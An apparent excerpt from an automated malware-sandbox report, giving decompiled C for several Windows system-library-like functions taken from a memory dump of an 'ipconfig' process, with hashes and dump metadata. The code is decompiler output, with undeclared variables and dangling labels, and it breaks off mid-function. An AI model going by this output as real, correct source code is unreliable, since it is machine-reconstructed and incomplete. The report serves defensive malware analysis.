              • Opcode Fuzzy Hash: 0783c6e2a3ff1dafaf5653e58cd957f2dae1cc53159c3fb2c5452ea37da65446
              • Instruction Fuzzy Hash: 35518D75A40609CFCB15CFA8C890AEEFBF2BF4A354F20965AD595A7340DB31A944CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E02EAEF40(intOrPtr __ecx) {
              				char _v5;
              				char _v6;
              				char _v7;
              				char _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t58;
              				char _t59;
              				signed char _t69;
              				void* _t73;
              				signed int _t74;
              				char _t79;
              				signed char _t81;
              				signed int _t85;
              				signed int _t87;
              				intOrPtr _t90;
              				signed char* _t91;
              				void* _t92;
              				signed int _t94;
              				void* _t96;
              
              				_t90 = __ecx;
              				_v16 = __ecx;
              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
              					_t58 =  *((intOrPtr*)(__ecx));
              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
              						E02E99080(_t73, __ecx, __ecx, _t92);
              					}
              				}
              				_t74 = 0;
              				_t96 =  *0x7ffe036a - 1;
              				_v12 = 0;
              				_v7 = 0;
              				if(_t96 > 0) {
              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
              					_v12 = _t74;
              					_v7 = _t96 != 0;
              				}
              				_t79 = 0;
              				_v8 = 0;
              				_v5 = 0;
              				while(1) {
              					L4:
              					_t59 = 1;
              					L5:
              					while(1) {
              						if(_t59 == 0) {
              							L12:
              							_t21 = _t90 + 4; // 0x779cc21e
              							_t87 =  *_t21;
              							_v6 = 0;
              							if(_t79 != 0) {
              								if((_t87 & 0x00000002) != 0) {
              									goto L19;
              								}
              								if((_t87 & 0x00000001) != 0) {
              									_v6 = 1;
              									_t74 = _t87 ^ 0x00000003;
              								} else {
              									_t51 = _t87 - 2; // -2
              									_t74 = _t51;
              								}
              								goto L15;
              							} else {
              								if((_t87 & 0x00000001) != 0) {
              									_v6 = 1;
              									_t74 = _t87 ^ 0x00000001;
              								} else {
              									_t26 = _t87 - 4; // -4
              									_t74 = _t26;
              									if((_t74 & 0x00000002) == 0) {
              										_t74 = _t74 - 2;
              									}
              								}
              								L15:
              								if(_t74 == _t87) {
              									L19:
              									E02E92D8A(_t74, _t90, _t87, _t90);
              									_t74 = _v12;
              									_v8 = 1;
              									if(_v7 != 0 && _t74 > 0x64) {
              										_t74 = _t74 - 1;
              										_v12 = _t74;
              									}
              									_t79 = _v5;
              									goto L4;
              								}
              								asm("lock cmpxchg [esi], ecx");
              								if(_t87 != _t87) {
              									_t74 = _v12;
              									_t59 = 0;
              									_t79 = _v5;
              									continue;
              								}
              								if(_v6 != 0) {
              									_t74 = _v12;
              									L25:
              									if(_v7 != 0) {
              										if(_t74 < 0x7d0) {
              											if(_v8 == 0) {
              												_t74 = _t74 + 1;
              											}
              										}
              										_t38 = _t90 + 0x14; // 0x0
              										_t39 = _t90 + 0x14; // 0x0
              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
              											_t85 = _t85 & 0xff000000;
              										}
              										 *(_t90 + 0x14) = _t85;
              									}
              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
              									 *((intOrPtr*)(_t90 + 8)) = 1;
              									return 0;
              								}
              								_v5 = 1;
              								_t87 = _t74;
              								goto L19;
              							}
              						}
              						_t94 = _t74;
              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
              						if(_t74 == 0) {
              							goto L12;
              						} else {
              							_t91 = _t90 + 4;
              							goto L8;
              							L9:
              							while((_t81 & 0x00000001) != 0) {
              								_t69 = _t81;
              								asm("lock cmpxchg [edi], edx");
              								if(_t69 != _t81) {
              									_t81 = _t69;
              									continue;
              								}
              								_t90 = _v16;
              								goto L25;
              							}
              							asm("pause");
              							_t94 = _t94 - 1;
              							if(_t94 != 0) {
              								L8:
              								_t81 =  *_t91;
              								goto L9;
              							} else {
              								_t90 = _v16;
              								_t79 = _v5;
              								goto L12;
              							}
              						}
              					}
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction ID: 198ad5c5431f7ccc1cbfddb46ee0d918c64c99134c7eb498bd6ee90963cfacb1
              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction Fuzzy Hash: 06510030E842499FDB20CB69C0E17EEBBB1EF1530CF18E1A8D5459B681C376B988C791
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 84%
              			E02F6740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
              				signed short* _v8;
              				intOrPtr _v12;
              				intOrPtr _t55;
              				void* _t56;
              				intOrPtr* _t66;
              				intOrPtr* _t69;
              				void* _t74;
              				intOrPtr* _t78;
              				intOrPtr* _t81;
              				intOrPtr* _t82;
              				intOrPtr _t83;
              				signed short* _t84;
              				intOrPtr _t85;
              				signed int _t87;
              				intOrPtr* _t90;
              				intOrPtr* _t93;
              				intOrPtr* _t94;
              				void* _t98;
              
              				_t84 = __edx;
              				_t80 = __ecx;
              				_push(__ecx);
              				_push(__ecx);
              				_t55 = __ecx;
              				_v8 = __edx;
              				_t87 =  *__edx & 0x0000ffff;
              				_v12 = __ecx;
              				_t3 = _t55 + 0x154; // 0x154
              				_t93 = _t3;
              				_t78 =  *_t93;
              				_t4 = _t87 + 2; // 0x2
              				_t56 = _t4;
              				while(_t78 != _t93) {
              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
              						L4:
              						_t78 =  *_t78;
              						continue;
              					} else {
              						_t7 = _t78 + 0x18; // 0x18
              						if(E02EED4F0(_t7, _t84[2], _t87) == _t87) {
              							_t40 = _t78 + 0xc; // 0xc
              							_t94 = _t40;
              							_t90 =  *_t94;
              							while(_t90 != _t94) {
              								_t41 = _t90 + 8; // 0x8
              								_t74 = E02EDF380(_a4, _t41, 0x10);
              								_t98 = _t98 + 0xc;
              								if(_t74 != 0) {
              									_t90 =  *_t90;
              									continue;
              								}
              								goto L12;
              							}
              							_t82 = L02EB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
              							if(_t82 != 0) {
              								_t46 = _t78 + 0xc; // 0xc
              								_t69 = _t46;
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t85 =  *_t69;
              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
              									L20:
              									_t82 = 3;
              									asm("int 0x29");
              								}
              								 *((intOrPtr*)(_t82 + 4)) = _t69;
              								 *_t82 = _t85;
              								 *((intOrPtr*)(_t85 + 4)) = _t82;
              								 *_t69 = _t82;
              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
              								goto L11;
              							} else {
              								L18:
              								_push(0xe);
              								_pop(0);
              							}
              						} else {
              							_t84 = _v8;
              							_t9 = _t87 + 2; // 0x2
              							_t56 = _t9;
              							goto L4;
              						}
              					}
              					L12:
              					return 0;
              				}
              				_t10 = _t87 + 0x1a; // 0x1a
              				_t78 = L02EB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
              				if(_t78 == 0) {
              					goto L18;
              				} else {
              					_t12 = _t87 + 2; // 0x2
              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
              					_t16 = _t78 + 0x18; // 0x18
              					E02EDF3E0(_t16, _v8[2], _t87);
              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
              					_t19 = _t78 + 0xc; // 0xc
              					_t66 = _t19;
              					 *((intOrPtr*)(_t66 + 4)) = _t66;
              					 *_t66 = _t66;
              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
              					_t81 = L02EB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
              					if(_t81 == 0) {
              						goto L18;
              					} else {
              						_t26 = _t78 + 0xc; // 0xc
              						_t69 = _t26;
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						_t85 =  *_t69;
              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
              							goto L20;
              						} else {
              							 *((intOrPtr*)(_t81 + 4)) = _t69;
              							 *_t81 = _t85;
              							 *((intOrPtr*)(_t85 + 4)) = _t81;
              							 *_t69 = _t81;
              							_t83 = _v12;
              							 *(_t78 + 8) = 1;
              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
              							_t34 = _t83 + 0x154; // 0x1ba
              							_t69 = _t34;
              							_t85 =  *_t69;
              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
              								goto L20;
              							} else {
              								 *_t78 = _t85;
              								 *((intOrPtr*)(_t78 + 4)) = _t69;
              								 *((intOrPtr*)(_t85 + 4)) = _t78;
              								 *_t69 = _t78;
              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
              							}
              						}
              						goto L11;
              					}
              				}
              				goto L12;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction ID: 86852d012fdade59db63bf02c4d59e4de124b92e5350ec82cbd43ea1f92c97f6
              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction Fuzzy Hash: DF51C071A00606EFDB15DF14C584AA6FBB5FF44348F14C1AAE9089F216E371E946CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 97%
              			E02EC2990() {
              				signed int* _t62;
              				signed int _t64;
              				intOrPtr _t66;
              				signed short* _t69;
              				intOrPtr _t76;
              				signed short* _t79;
              				void* _t81;
              				signed int _t82;
              				signed short* _t83;
              				signed int _t87;
              				intOrPtr _t91;
              				void* _t98;
              				signed int _t99;
              				void* _t101;
              				signed int* _t102;
              				void* _t103;
              				void* _t104;
              				void* _t107;
              
              				_push(0x20);
              				_push(0x2f6ff00);
              				E02EED08C(_t81, _t98, _t101);
              				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
              				_t99 = 0;
              				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
              				_t82 =  *((intOrPtr*)(_t103 + 0x10));
              				if(_t82 == 0) {
              					_t62 = 0xc0000100;
              				} else {
              					 *((intOrPtr*)(_t103 - 4)) = 0;
              					_t102 = 0xc0000100;
              					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
              					_t64 = 4;
              					while(1) {
              						 *(_t103 - 0x24) = _t64;
              						if(_t64 == 0) {
              							break;
              						}
              						_t87 = _t64 * 0xc;
              						 *(_t103 - 0x2c) = _t87;
              						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2e71664));
              						if(_t107 <= 0) {
              							if(_t107 == 0) {
              								_t79 = E02EDE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2e71668)), _t82);
              								_t104 = _t104 + 0xc;
              								__eflags = _t79;
              								if(__eflags == 0) {
              									_t102 = E02F151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2e7166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
              									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
              									break;
              								} else {
              									_t64 =  *(_t103 - 0x24);
              									goto L5;
              								}
              								goto L13;
              							} else {
              								L5:
              								_t64 = _t64 - 1;
              								continue;
              							}
              						}
              						break;
              					}
              					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
              					__eflags = _t102;
              					if(_t102 < 0) {
              						__eflags = _t102 - 0xc0000100;
              						if(_t102 == 0xc0000100) {
              							_t83 =  *((intOrPtr*)(_t103 + 8));
              							__eflags = _t83;
              							if(_t83 != 0) {
              								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
              								__eflags =  *_t83 - _t99;
              								if( *_t83 == _t99) {
              									_t102 = 0xc0000100;
              									goto L19;
              								} else {
              									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
              									_t66 =  *((intOrPtr*)(_t91 + 0x10));
              									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
              									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
              										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
              										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
              											L26:
              											_t102 = E02EC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
              											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
              											__eflags = _t102 - 0xc0000100;
              											if(_t102 != 0xc0000100) {
              												goto L12;
              											} else {
              												_t99 = 1;
              												_t83 =  *((intOrPtr*)(_t103 - 0x20));
              												goto L18;
              											}
              										} else {
              											_t69 = E02EA6600( *((intOrPtr*)(_t91 + 0x1c)));
              											__eflags = _t69;
              											if(_t69 != 0) {
              												goto L26;
              											} else {
              												_t83 =  *((intOrPtr*)(_t103 + 8));
              												goto L18;
              											}
              										}
              									} else {
              										L18:
              										_t102 = E02EC2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
              										L19:
              										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
              										goto L12;
              									}
              								}
              								L28:
              							} else {
              								E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              								 *((intOrPtr*)(_t103 - 4)) = 1;
              								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
              								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
              								_t76 = E02EC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
              								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
              								__eflags = _t76 - 0xc0000100;
              								if(_t76 == 0xc0000100) {
              									 *((intOrPtr*)(_t103 - 0x1c)) = E02EC2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
              								}
              								 *((intOrPtr*)(_t103 - 4)) = _t99;
              								E02EC2ACB();
              							}
              						}
              					}
              					L12:
              					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
              					_t62 = _t102;
              				}
              				L13:
              				return E02EED0D1(_t62);
              				goto L28;
              			}






















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bd6c2ac257e91e943f8871bd15f2b8e43f4b68af1fe833c123bda8612aed8df1
              • Instruction ID: 1c0215c50d6d47c7b5f9993bea174a9e36d243c5073d186e4a1ee25266234c22
              • Opcode Fuzzy Hash: bd6c2ac257e91e943f8871bd15f2b8e43f4b68af1fe833c123bda8612aed8df1
              • Instruction Fuzzy Hash: 7B515471A402099FDF25CF94CA80ADEBBB6BB48354F25D019EE05AB260C3719952CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E02EC4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
              				signed int _v8;
              				short _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				char _v36;
              				char _v156;
              				short _v158;
              				intOrPtr _v160;
              				char _v164;
              				intOrPtr _v168;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t45;
              				intOrPtr _t74;
              				signed char _t77;
              				intOrPtr _t84;
              				char* _t85;
              				void* _t86;
              				intOrPtr _t87;
              				signed short _t88;
              				signed int _t89;
              
              				_t83 = __edx;
              				_v8 =  *0x2f8d360 ^ _t89;
              				_t45 = _a8 & 0x0000ffff;
              				_v158 = __edx;
              				_v168 = __ecx;
              				if(_t45 == 0) {
              					L22:
              					_t86 = 6;
              					L12:
              					E02E9CC50(_t86);
              					L11:
              					return E02EDB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
              				}
              				_t77 = _a4;
              				if((_t77 & 0x00000001) != 0) {
              					goto L22;
              				}
              				_t8 = _t77 + 0x34; // 0xdce0ba00
              				if(_t45 !=  *_t8) {
              					goto L22;
              				}
              				_t9 = _t77 + 0x24; // 0x2f88504
              				E02EB2280(_t9, _t9);
              				_t87 = 0x78;
              				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
              				E02EDFA60( &_v156, 0, _t87);
              				_t13 = _t77 + 0x30; // 0x3db8
              				_t85 =  &_v156;
              				_v36 =  *_t13;
              				_v28 = _v168;
              				_v32 = 0;
              				_v24 = 0;
              				_v20 = _v158;
              				_v160 = 0;
              				while(1) {
              					_push( &_v164);
              					_push(_t87);
              					_push(_t85);
              					_push(0x18);
              					_push( &_v36);
              					_push(0x1e);
              					_t88 = E02EDB0B0();
              					if(_t88 != 0xc0000023) {
              						break;
              					}
              					if(_t85 !=  &_v156) {
              						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
              					}
              					_t84 = L02EB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
              					_v168 = _v164;
              					if(_t84 == 0) {
              						_t88 = 0xc0000017;
              						goto L19;
              					} else {
              						_t74 = _v160 + 1;
              						_v160 = _t74;
              						if(_t74 >= 0x10) {
              							L19:
              							_t86 = E02E9CCC0(_t88);
              							if(_t86 != 0) {
              								L8:
              								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
              								_t30 = _t77 + 0x24; // 0x2f88504
              								E02EAFFB0(_t77, _t84, _t30);
              								if(_t84 != 0 && _t84 !=  &_v156) {
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
              								}
              								if(_t86 != 0) {
              									goto L12;
              								} else {
              									goto L11;
              								}
              							}
              							L6:
              							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
              							if(_v164 != 0) {
              								_t83 = _t84;
              								E02EC4F49(_t77, _t84);
              							}
              							goto L8;
              						}
              						_t87 = _v168;
              						continue;
              					}
              				}
              				if(_t88 != 0) {
              					goto L19;
              				}
              				goto L6;
              			}



























              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b0254bdda62b95029d43143951145cfcb60796502741fd4d1fc38779c5b036a
              • Instruction ID: 79ee95c60e8b3182509e83f78ef0e3c80ab4f2bb4335a433d1c6fccbf1569310
              • Opcode Fuzzy Hash: 8b0254bdda62b95029d43143951145cfcb60796502741fd4d1fc38779c5b036a
              • Instruction Fuzzy Hash: 4441B535E8022C9BDB21DF64C940FEA77B9AF45740F1150A9E908EB290DB34DE81CF91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E02EC4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				signed int _v12;
              				char _v176;
              				char _v177;
              				char _v184;
              				intOrPtr _v192;
              				intOrPtr _v196;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed short _t42;
              				char* _t44;
              				intOrPtr _t46;
              				intOrPtr _t50;
              				char* _t57;
              				intOrPtr _t59;
              				intOrPtr _t67;
              				signed int _t69;
              
              				_t64 = __edx;
              				_v12 =  *0x2f8d360 ^ _t69;
              				_t65 = 0xa0;
              				_v196 = __edx;
              				_v177 = 0;
              				_t67 = __ecx;
              				_v192 = __ecx;
              				E02EDFA60( &_v176, 0, 0xa0);
              				_t57 =  &_v176;
              				_t59 = 0xa0;
              				if( *0x2f87bc8 != 0) {
              					L3:
              					while(1) {
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						_t67 = _v192;
              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
              						_push( &_v184);
              						_push(_t59);
              						_push(_t57);
              						_push(0xa0);
              						_push(_t57);
              						_push(0xf);
              						_t42 = E02EDB0B0();
              						if(_t42 != 0xc0000023) {
              							break;
              						}
              						if(_v177 != 0) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
              						}
              						_v177 = 1;
              						_t44 = L02EB4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
              						_t59 = _v184;
              						_t57 = _t44;
              						if(_t57 != 0) {
              							continue;
              						} else {
              							_t42 = 0xc0000017;
              							break;
              						}
              					}
              					if(_t42 != 0) {
              						_t65 = E02E9CCC0(_t42);
              						if(_t65 != 0) {
              							L10:
              							if(_v177 != 0) {
              								if(_t57 != 0) {
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
              								}
              							}
              							_t46 = _t65;
              							L12:
              							return E02EDB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
              						}
              						L7:
              						_t50 = _a4;
              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
              						if(_t50 != 3) {
              							if(_t50 == 2) {
              								goto L8;
              							}
              							L9:
              							if(E02EDF380(_t67 + 0xc, 0x2e75138, 0x10) == 0) {
              								 *0x2f860d8 = _t67;
              							}
              							goto L10;
              						}
              						L8:
              						_t64 = _t57 + 0x28;
              						E02EC4F49(_t67, _t57 + 0x28);
              						goto L9;
              					}
              					_t65 = 0;
              					goto L7;
              				}
              				if(E02EC4E70(0x2f886b0, 0x2ec5690, 0, 0) != 0) {
              					_t46 = E02E9CCC0(_t56);
              					goto L12;
              				} else {
              					_t59 = 0xa0;
              					goto L3;
              				}
              			}





















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c65083d160059e218c718b97a3031e80efb93accb531e7a8a1d2d518dc9d08b
              • Instruction ID: 5accbc1a1e2f798c06e4c3f516ad7ec2238ac0280f9e613fe634740276928b65
              • Opcode Fuzzy Hash: 7c65083d160059e218c718b97a3031e80efb93accb531e7a8a1d2d518dc9d08b
              • Instruction Fuzzy Hash: E941EEB1A803189FEB21DF64CD90BABB7AAEB44714F11909EE9469B2C0D770DD41CA91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E02EA8A0A(intOrPtr* __ecx, signed int __edx) {
              				signed int _v8;
              				char _v524;
              				signed int _v528;
              				void* _v532;
              				char _v536;
              				char _v540;
              				char _v544;
              				intOrPtr* _v548;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t44;
              				void* _t46;
              				void* _t48;
              				signed int _t53;
              				signed int _t55;
              				intOrPtr* _t62;
              				void* _t63;
              				unsigned int _t75;
              				signed int _t79;
              				unsigned int _t81;
              				unsigned int _t83;
              				signed int _t84;
              				void* _t87;
              
              				_t76 = __edx;
              				_v8 =  *0x2f8d360 ^ _t84;
              				_v536 = 0x200;
              				_t79 = 0;
              				_v548 = __edx;
              				_v544 = 0;
              				_t62 = __ecx;
              				_v540 = 0;
              				_v532 =  &_v524;
              				if(__edx == 0 || __ecx == 0) {
              					L6:
              					return E02EDB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
              				} else {
              					_v528 = 0;
              					E02EAE9C0(1, __ecx, 0, 0,  &_v528);
              					_t44 = _v528;
              					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
              					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
              					_t46 = 0xa;
              					_t87 = _t81 - _t46;
              					if(_t87 > 0 || _t87 == 0) {
              						 *_v548 = 0x2e71180;
              						L5:
              						_t79 = 1;
              						goto L6;
              					} else {
              						_t48 = E02EC1DB5(_t62,  &_v532,  &_v536);
              						_t76 = _v528;
              						if(_t48 == 0) {
              							L9:
              							E02ED3C2A(_t81, _t76,  &_v544);
              							 *_v548 = _v544;
              							goto L5;
              						}
              						_t62 = _v532;
              						if(_t62 != 0) {
              							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
              							_t53 =  *_t62;
              							_v528 = _t53;
              							if(_t53 != 0) {
              								_t63 = _t62 + 4;
              								_t55 = _v528;
              								do {
              									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
              										if(E02EA8999(_t63,  &_v540) == 0) {
              											_t55 = _v528;
              										} else {
              											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
              											_t55 = _v528;
              											if(_t75 >= _t83) {
              												_t83 = _t75;
              											}
              										}
              									}
              									_t63 = _t63 + 0x14;
              									_t55 = _t55 - 1;
              									_v528 = _t55;
              								} while (_t55 != 0);
              								_t62 = _v532;
              							}
              							if(_t62 !=  &_v524) {
              								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
              							}
              							_t76 = _t83 & 0x0000ffff;
              							_t81 = _t83 >> 0x10;
              						}
              						goto L9;
              					}
              				}
              			}




























              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 841e1481fafccf950c76554cfcb81d94b28daaf50a534ed53ff292ae1f877d8d
              • Instruction ID: 09bcc67baaac65e237dd6f3b6e7105999ba38bf34a251b1c40b4f9c5dfaf7373
              • Opcode Fuzzy Hash: 841e1481fafccf950c76554cfcb81d94b28daaf50a534ed53ff292ae1f877d8d
              • Instruction Fuzzy Hash: 5C4183B4A8122C9BDB64DF15CCA8BE9B7F5FB44304F1095EAD8199B241E770AE80CF50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02F5AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
              				intOrPtr _v8;
              				char _v12;
              				signed int _v16;
              				signed char _v20;
              				intOrPtr _v24;
              				char* _t37;
              				void* _t47;
              				signed char _t51;
              				void* _t53;
              				char _t55;
              				intOrPtr _t57;
              				signed char _t61;
              				intOrPtr _t75;
              				void* _t76;
              				signed int _t81;
              				intOrPtr _t82;
              
              				_t53 = __ecx;
              				_t55 = 0;
              				_v20 = _v20 & 0;
              				_t75 = __edx;
